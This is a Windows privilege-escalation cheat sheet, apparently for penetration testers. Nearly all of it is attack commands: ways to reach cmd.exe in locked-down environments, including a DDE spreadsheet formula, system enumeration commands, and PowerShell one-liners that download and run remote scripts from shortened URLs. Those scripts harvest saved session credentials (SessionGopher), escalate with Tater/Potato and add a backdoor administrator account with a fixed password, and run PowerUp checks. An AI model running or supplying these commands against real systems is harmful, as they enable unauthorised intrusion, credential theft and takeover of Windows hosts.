Enter in address bar:
file://C:\Windows\System32\cmd.exe
Place this in a cell and press enter:
=cmd|' /k cmd.exe'!'A1'
press Windows key and enter search. Note that admins frequently block cmd.exe and Powershell but forget to block Powershell ISE.
From the registry: reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
Get Windows system information: systeminfo
set
whoami /all
net localgroup administrators
wmic qfe get Caption,Description, HotFixID,InstalledOn
searchsploit MS16 windows local
https://github.com/fireeye/SessionGopher
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2nrfTPI');Invoke-SessionGopher -AllDomain -o"
Reference: https://github.com/foxglovesec/Potato
https://github.com/Kevin-Robertson/Tater
Examples: Basic trigger 1 example:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Basic trigger 2 example:
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
Two system setup to get around port 80 being in-use on the privesc target
WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"
Privesc Target - 192.168.10.101
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks” > powerup.txt
Look for "SeImpersonatePrivilege:
whoami /priv